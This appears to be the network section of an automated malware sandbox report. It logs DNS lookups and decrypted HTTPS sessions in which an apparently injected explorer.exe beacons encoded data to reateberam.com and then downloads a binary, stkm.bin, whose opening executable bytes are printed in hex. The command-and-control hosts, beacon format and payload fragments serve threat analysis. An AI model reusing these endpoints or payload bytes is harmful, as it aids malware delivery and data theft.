Dec 2, 2024 18:43:02.232327938 CET	50054	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:43:02.401509047 CET	50054	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:43:02.401524067 CET	443	50054	104.21.68.89	192.168.2.4
Dec 2, 2024 18:43:02.403992891 CET	50054	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:43:02.403997898 CET	443	50054	104.21.68.89	192.168.2.4
Dec 2, 2024 18:43:03.873946905 CET	443	50054	104.21.68.89	192.168.2.4
Dec 2, 2024 18:43:03.874068975 CET	443	50054	104.21.68.89	192.168.2.4
Dec 2, 2024 18:43:03.874165058 CET	50054	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:43:03.875592947 CET	50054	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:43:03.875610113 CET	443	50054	104.21.68.89	192.168.2.4
Dec 2, 2024 18:43:04.084062099 CET	50055	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:43:04.084095955 CET	443	50055	104.21.68.89	192.168.2.4
Dec 2, 2024 18:43:04.084151983 CET	50055	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:43:04.084531069 CET	50055	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:43:04.084544897 CET	443	50055	104.21.68.89	192.168.2.4
Dec 2, 2024 18:43:05.403224945 CET	443	50055	104.21.68.89	192.168.2.4
Dec 2, 2024 18:43:05.403332949 CET	50055	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:43:20.193890095 CET	443	50055	104.21.68.89	192.168.2.4
Dec 2, 2024 18:43:20.196163893 CET	50055	443	192.168.2.4	104.21.68.89

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2024 18:39:03.233789921 CET	50431	53	192.168.2.4	1.1.1.1
Dec 2, 2024 18:39:04.240276098 CET	50431	53	192.168.2.4	1.1.1.1
Dec 2, 2024 18:39:04.690597057 CET	53	50431	1.1.1.1	192.168.2.4
Dec 2, 2024 18:39:04.690613031 CET	53	50431	1.1.1.1	192.168.2.4
Dec 2, 2024 18:40:57.947604895 CET	52206	53	192.168.2.4	1.1.1.1
Dec 2, 2024 18:40:58.292305946 CET	53	52206	1.1.1.1	192.168.2.4
Dec 2, 2024 18:41:39.589070082 CET	56975	53	192.168.2.4	1.1.1.1
Dec 2, 2024 18:41:39.883893013 CET	53	56975	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 2, 2024 18:39:03.233789921 CET	192.168.2.4	1.1.1.1	0xf5ae	Standard query (0)	huanvn.com	A (IP address)	IN (0x0001)	false
Dec 2, 2024 18:39:04.240276098 CET	192.168.2.4	1.1.1.1	0xf5ae	Standard query (0)	huanvn.com	A (IP address)	IN (0x0001)	false
Dec 2, 2024 18:40:57.947604895 CET	192.168.2.4	1.1.1.1	0x9620	Standard query (0)	reateberam.com	A (IP address)	IN (0x0001)	false
Dec 2, 2024 18:41:39.589070082 CET	192.168.2.4	1.1.1.1	0x2ac4	Standard query (0)	dogirafer.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 2, 2024 18:39:04.690597057 CET	1.1.1.1	192.168.2.4	0xf5ae	No error (0)	huanvn.com	103.57.249.207	A (IP address)	IN (0x0001)	false
Dec 2, 2024 18:39:04.690613031 CET	1.1.1.1	192.168.2.4	0xf5ae	No error (0)	huanvn.com	103.57.249.207	A (IP address)	IN (0x0001)	false
Dec 2, 2024 18:39:17.941155910 CET	1.1.1.1	192.168.2.4	0xa2c8	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 2, 2024 18:39:17.941155910 CET	1.1.1.1	192.168.2.4	0xa2c8	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 2, 2024 18:40:58.292305946 CET	1.1.1.1	192.168.2.4	0x9620	No error (0)	reateberam.com	104.21.16.251	A (IP address)	IN (0x0001)	false
Dec 2, 2024 18:40:58.292305946 CET	1.1.1.1	192.168.2.4	0x9620	No error (0)	reateberam.com	172.67.217.190	A (IP address)	IN (0x0001)	false
Dec 2, 2024 18:41:39.883893013 CET	1.1.1.1	192.168.2.4	0x2ac4	No error (0)	dogirafer.com	104.21.68.89	A (IP address)	IN (0x0001)	false
Dec 2, 2024 18:41:39.883893013 CET	1.1.1.1	192.168.2.4	0x2ac4	No error (0)	dogirafer.com	172.67.192.128	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reateberam.com

dogirafer.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49865	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:40:59 UTC	412	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hmdViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 92 Cache-Control: no-cache
2024-12-02 17:40:59 UTC	92	OUT	Data Raw: 4c 48 44 4d 46 38 2f 6d 69 75 38 77 5a 78 61 4b 31 32 79 31 6e 6e 78 4f 50 30 44 66 44 43 71 37 50 4b 48 76 2f 6d 4f 49 4d 47 66 2f 7a 54 71 76 33 47 62 5a 37 2f 2f 74 74 69 45 36 65 52 70 37 49 38 33 73 6e 6b 68 63 57 65 2f 71 78 36 78 74 7a 50 48 55 30 36 70 42 69 45 45 3d Data Ascii: LHDMF8/miu8wZxaK12y1nnxOP0DfDCq7PKHv/mOIMGf/zTqv3GbZ7//ttiE6eRp7I83snkhcWe/qx6xtzPHU06pBiEE=
2024-12-02 17:41:00 UTC	797	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:41:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xMHB08Y4lVwLIHjqiub3l5c%2BXoFmXQ%2BJEHqR4TarAqjhw6emD5cR7%2FUguEIyXYvoVLrgPgqjjnAJuF9XjH%2BOxFVwBIMuZHcl7wH%2Fx5X6Iw691Efd2S%2FAvTF09wk4bPJxvg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1af27fb4a1e6-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14127&min_rtt=14038&rtt_var=5328&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1164&delivery_rate=208006&cwnd=32&unsent_bytes=0&cid=fc7ce64465e50450&ts=828&x=0"
2024-12-02 17:41:00 UTC	98	IN	Data Raw: 35 63 0d 0a 4d 79 57 59 51 73 65 33 32 34 70 6b 59 52 54 66 67 6d 44 6c 67 33 42 49 4d 6b 4c 51 41 43 62 43 61 2f 36 7a 76 53 37 4b 4b 52 69 62 6e 57 62 37 32 47 37 53 37 35 58 71 75 54 4a 72 4a 55 49 75 4e 70 62 6d 67 46 73 6d 43 4c 72 51 75 61 51 4a 74 4a 75 71 72 49 51 44 31 77 3d 3d 0d 0a Data Ascii: 5cMyWYQse324pkYRTfgmDlg3BIMkLQACbCa/6zvS7KKRibnWb72G7S75XquTJrJUIuNpbmgFsmCLrQuaQJtJuqrIQD1w==
2024-12-02 17:41:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49873	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:41:02 UTC	411	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hndViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:41:03 UTC	792	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:41:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I1scVCYnW1h9V5dfebfRhGrthUfl2MesY2HGZWs2GZxX6X%2BXzIMIGUQ1CqLMkihkVQ1ErFrK2AmsHDq6946lBc8coa%2FL6DRQsxode%2BT7hpirsb400wI%2Ff6JIU5G39Sa9EQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1b07491bc33b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1680&rtt_var=632&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1049&delivery_rate=1727810&cwnd=170&unsent_bytes=0&cid=53853d6bf860ffe2&ts=737&x=0"
2024-12-02 17:41:03 UTC	54	IN	Data Raw: 33 30 0d 0a 4f 53 2b 66 51 73 43 79 32 6f 70 6c 61 68 6a 51 68 57 50 68 67 33 64 47 50 55 72 53 42 43 48 43 62 50 36 36 76 69 54 49 59 57 6d 63 70 67 3d 3d 0d 0a Data Ascii: 30OS+fQsCy2oplahjQhWPhg3dGPUrSBCHCbP66viTIYWmcpg==
2024-12-02 17:41:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49879	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:41:05 UTC	411	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hkdViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:41:05 UTC	792	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:41:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VgCHYGAHZFcuz4DPD8hpgcmSewfiQlmE1fMaOV5AQTXFmVyVf5yALFE%2BXjk1q2YDBn7Cj4YaY3kw5tG8KpKNOqPbpd0KDisj%2F9skR0uat94oCSABkugpa%2BdpfFrv8BX%2FaQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1b145cd478d6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1973&rtt_var=758&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1049&delivery_rate=1427872&cwnd=146&unsent_bytes=0&cid=892c94c846b780e8&ts=776&x=0"
2024-12-02 17:41:05 UTC	431	IN	Data Raw: 31 61 38 0d 0a 4f 53 69 64 54 63 61 30 32 6f 70 6c 59 42 6e 63 68 32 48 6e 67 33 4e 4b 4d 30 7a 58 42 69 54 43 62 66 71 30 75 69 62 46 5a 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 76 49 6b 4d 6a 65 5a 4c 6b 37 46 6b 6e 43 62 47 37 73 61 46 47 73 5a 61 6f 70 4d 45 39 36 55 35 52 47 6d 70 4a 37 63 53 69 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 73 30 42 75 7a 69 4a 42 56 2b 62 37 2f 4a 65 58 51 6b 35 4d 74 45 36 31 66 65 44 52 39 46 37 45 77 30 4d 56 6f 42 4e 6f 37 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 62 51 70 Data Ascii: 1a8OSidTca02oplYBnch2Hng3NKM0zXBiTCbfq0uibFZGmcphSGpB6yiJiVjA1vIkMjeZLk7FknCbG7saFGsZaopME96U5RGmpJ7cSifW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kcs0BuziJBV+b7/JeXQk5MtE61feDR9F7Ew0MVoBNo7MfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1bQp
2024-12-02 17:41:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49885	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:41:07 UTC	411	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hldViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:41:08 UTC	795	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:41:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xqK4BxsuhlPycLa1f1HcpjG%2FkXfxWxiVmQQsojX%2FdwIvlFx3fb%2FhV1dvxIuhxh1DP0Nz%2FHYiMEGuFyP%2FZFPp90ronAswHOhRfzi0DahDqopHcTakBIW0NQQXQNmjf1LEvw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1b256b685437-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14037&min_rtt=14030&rtt_var=5275&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1049&delivery_rate=207268&cwnd=32&unsent_bytes=0&cid=305ed0fcbaa25634&ts=788&x=0"
2024-12-02 17:41:08 UTC	427	IN	Data Raw: 31 61 34 0d 0a 50 69 69 63 51 4d 57 33 33 34 70 76 61 68 54 65 67 47 50 6f 67 33 42 4b 4d 6b 72 52 42 53 4c 43 62 76 36 31 74 69 58 45 5a 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 73 4a 45 63 6f 65 4a 54 69 37 46 59 69 43 37 43 34 74 71 46 47 74 70 4f 73 6f 38 38 39 37 55 35 56 47 47 52 4e 35 73 4f 6e 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 30 34 41 75 2f 6b 49 78 39 2b 62 62 44 44 65 58 51 71 37 73 74 42 35 31 4c 62 43 42 31 43 37 45 73 39 4f 56 73 4d 4e 34 2f 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 57 52 4a Data Ascii: 1a4PiicQMW334pvahTegGPog3BKMkrRBSLCbv61tiXEZGmcphSGpB6yiJiVjA1sJEcoeJTi7FYiC7C4tqFGtpOso8897U5VGGRN5sOnfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kc04Au/kIx9+bbDDeXQq7stB51LbCB1C7Es9OVsMN4/MfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1WRJ
2024-12-02 17:41:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49891	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:41:11 UTC	127	OUT	GET /files/stkm.bin HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com
2024-12-02 17:41:12 UTC	947	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:41:12 GMT Content-Type: application/octet-stream Content-Length: 857600 Connection: close Content-Disposition: attachment; filename = stkm.bin Cache-Control: max-age=14400 CF-Cache-Status: MISS Last-Modified: Mon, 02 Dec 2024 17:41:12 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IlVi%2BdjAi%2F2nbcI9neiYEW%2BuaIr5hPke76%2Ba84dhr8C8DJ7%2BzXPfk%2BJ0Uo28Q44BVieSrhNzu2hXwAFfTe8vVgz%2FtYJ2XUw61E14cC%2FGRo3jFJu0N28t5H%2F5FSqk1SfThg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1b3cde747d26-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=2009&rtt_var=758&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=765&delivery_rate=1439132&cwnd=194&unsent_bytes=0&cid=00890366941c0809&ts=2579&x=0"
2024-12-02 17:41:12 UTC	422	IN	Data Raw: 4d 5a 45 52 e8 00 00 00 00 59 48 83 e9 09 48 8b c1 48 05 00 10 0d 00 ff d0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 96 98 3e 4d f7 f6 6d 4d f7 f6 6d 4d f7 f6 6d f9 6b 07 6d 4a f7 f6 6d f9 6b 05 6d d6 f7 f6 6d f9 6b 04 6d 42 f7 f6 6d e0 a9 f5 6c 4a f7 f6 6d e0 a9 f3 6c 51 f7 f6 6d e0 a9 f2 6c 5c f7 f6 6d 44 8f 75 6d 4c f7 f6 6d 44 8f 71 6d 4c f7 f6 6d 44 8f 65 6d 42 f7 f6 6d 4d f7 f7 6d ff f7 f6 6d f8 a9 fe 6c 5b f7 f6 6d f8 a9 09 6d 4c f7 f6 6d f8 a9 f4 6c 4c f7 f6 6d 52 69 63 68 4d f7 f6 Data Ascii: MZERYHHH!L!This program cannot be run in DOS mode.$>MmMmMmkmJmkmmkmBmlJmlQml\mDumLmDqmLmDemBmMmml[mmLmlLmRichM
2024-12-02 17:41:12 UTC	1369	IN	Data Raw: 00 00 00 70 0c 00 20 5b 00 00 00 00 00 00 00 00 00 00 00 f0 0c 00 70 10 00 00 d0 b8 0b 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 b9 0b 00 94 00 00 00 00 00 00 00 00 00 00 00 00 50 0a 00 68 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 30 0a 00 00 10 00 00 00 30 0a 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 62 73 73 00 00 00 00 00 00 10 00 00 00 40 0a 00 00 10 00 00 00 40 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 64 61 74 61 00 00 00 c0 01 00 00 50 0a 00 00 c0 01 00 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 60 00 00 00 10 0c 00 00 60 00 00 00 10 0c 00 00 00 00 00 00 Data Ascii: p [p8Ph.text00 `bss@@.rdataPP@@.data``
2024-12-02 17:41:12 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-12-02 17:41:12 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-12-02 17:41:12 UTC	1369	IN	Data Raw: 20 74 09 ff c2 66 39 4c 54 20 75 f7 48 8d 4c 24 20 e8 cd 13 00 00 eb 02 33 c0 48 81 c4 38 02 00 00 c3 cc 48 89 5c 24 08 48 89 7c 24 10 55 48 8d ac 24 60 fd ff ff 48 81 ec a0 03 00 00 48 8d 0d 7b 4a 0c 00 c7 44 24 20 eb 2f 76 e0 48 8d 05 ac 46 0c 00 48 89 4c 24 28 48 89 44 24 30 48 8d 05 53 46 0c 00 48 89 44 24 48 48 8d 05 4f 46 0c 00 48 89 44 24 60 48 8d 05 4b 46 0c 00 48 89 44 24 78 48 8d 05 d7 46 0c 00 48 89 45 90 48 8d 05 3c 46 0c 00 48 89 45 a8 48 8d 05 39 46 0c 00 48 89 45 c0 48 8d 05 36 46 0c 00 48 89 45 d8 48 8d 05 33 46 0c 00 48 89 45 f0 48 8d 05 30 46 0c 00 48 89 45 08 48 8d 05 2d 46 0c 00 48 89 45 20 48 8d 05 32 46 0c 00 48 89 45 38 48 8d 05 2f 46 0c 00 48 89 45 50 48 8d 05 2c 46 0c 00 48 89 45 68 48 8d 05 29 46 0c 00 48 89 85 80 00 00 00 48 8d Data Ascii: tf9LT uHL$ 3H8H\$H\|$UH$`HH{JD$ /vHFHL$(HD$0HSFHD$HHOFHD$`HKFHD$xHFHEH<FHEH9FHEH6FHEH3FHEH0FHEH-FHE H2FHE8H/FHEPH,FHEhH)FHH
2024-12-02 17:41:12 UTC	1369	IN	Data Raw: 41 57 48 8d a8 48 fe ff ff 48 81 ec 90 02 00 00 48 8d 05 5f 45 0c 00 c7 44 24 20 3b 64 d2 03 48 89 44 24 28 48 8d 74 24 28 48 8d 05 4e 45 0c 00 c7 44 24 30 7f 27 64 e7 45 33 e4 48 89 44 24 38 45 8b f4 4c 8d 2d f4 bf 0a 00 e8 23 fa ff ff e8 1e fa ff ff 48 89 85 c0 01 00 00 48 85 c0 0f 84 e5 00 00 00 41 8b fc ff c7 66 45 39 64 7d 00 75 f6 41 8b dc 66 44 39 20 74 09 ff c3 66 44 39 24 58 75 f7 8d 14 3b 8d 14 55 02 00 00 00 48 8d 8d c0 01 00 00 e8 1d 0d 00 00 85 c0 0f 84 a8 00 00 00 4c 8b bd c0 01 00 00 8b c3 49 8d 0c 47 03 ff 74 17 49 8b d5 44 8b c7 48 2b d1 8a 04 0a 88 01 48 ff c1 49 83 e8 01 75 f2 33 d2 48 8d 4c 24 40 41 b8 50 02 00 00 49 8b dc e8 c8 59 08 00 48 8d 54 24 40 49 8b cf ff 15 4a 44 0c 00 48 8b f8 48 83 f8 ff 74 4a eb 26 41 8b d4 66 44 39 64 24 Data Ascii: AWHHHH_ED$ ;dHD$(Ht$(HNED$0'dE3HD$8EL-#HHAfE9d}uAfD9 tfD9$Xu;UHLIGtIDH+HIu3HL$@APIYHT$@IJDHHtJ&AfD9d$
2024-12-02 17:41:12 UTC	1369	IN	Data Raw: 85 d8 01 00 00 1b c3 53 2b 48 89 95 e0 01 00 00 c7 85 f0 01 00 00 f2 cb 55 df 48 89 95 f8 01 00 00 c7 85 08 02 00 00 4a 47 2d d5 48 89 95 10 02 00 00 c7 85 20 02 00 00 57 12 a2 8a 48 89 95 28 02 00 00 c7 85 38 02 00 00 39 1e f1 72 48 89 95 40 02 00 00 c7 85 50 02 00 00 21 d0 52 45 48 89 95 58 02 00 00 c7 85 68 02 00 00 7a 8e 25 e9 48 89 95 70 02 00 00 c7 85 80 02 00 00 a4 1a 86 d0 48 89 95 88 02 00 00 c7 85 98 02 00 00 14 31 8b 23 48 89 95 a0 02 00 00 c7 85 b0 02 00 00 07 77 19 f5 48 89 95 b8 02 00 00 c7 85 c8 02 00 00 4d 11 46 05 48 89 95 d0 02 00 00 c7 85 e0 02 00 00 02 91 78 2d 48 8d 05 d2 3d 0c 00 48 89 95 e8 02 00 00 48 89 85 f0 02 00 00 48 8d 0d 2d 3f 0c 00 48 8d 05 ae 3d 0c 00 c7 85 f8 02 00 00 df 86 ef 27 48 89 85 08 03 00 00 48 8d 05 a6 3d 0c 00 Data Ascii: S+HUHJG-H WH(89rH@P!REHXhz%HpH1#HwHMFHx-H=HHH-?H='HH=
2024-12-02 17:41:12 UTC	1369	IN	Data Raw: 00 00 61 bc 1d 14 48 89 95 48 06 00 00 c7 85 58 06 00 00 cb a6 9c f4 48 89 95 60 06 00 00 c7 85 70 06 00 00 fd 53 ca 1c 48 89 95 78 06 00 00 c7 85 88 06 00 00 8d bf 40 ab 48 89 95 90 06 00 00 c7 85 a0 06 00 00 02 91 d8 59 48 89 95 a8 06 00 00 48 8d 05 1c 3a 0c 00 c7 85 b8 06 00 00 ce d5 eb c9 48 89 85 b0 06 00 00 48 8d 5c 24 28 48 8d 05 07 3a 0c 00 48 89 95 c0 06 00 00 48 89 85 c8 06 00 00 33 ff 48 8d 05 f8 39 0c 00 c7 85 d0 06 00 00 9f 60 3f 3d 48 89 85 e0 06 00 00 48 8d 05 e8 39 0c 00 48 89 85 f8 06 00 00 48 8d 05 ea 39 0c 00 48 89 85 10 07 00 00 48 8d 05 d4 39 0c 00 48 89 85 28 07 00 00 48 89 95 d8 06 00 00 c7 85 e8 06 00 00 9a f6 2b d8 48 89 95 f0 06 00 00 c7 85 00 07 00 00 48 29 27 75 48 89 95 08 07 00 00 c7 85 18 07 00 00 19 9c f3 81 48 89 95 20 07 Data Ascii: aHHXH`pSHx@HYHH:HH\$(H:HH3H9`?=HH9HH9HH9H(H+HH)'uHH
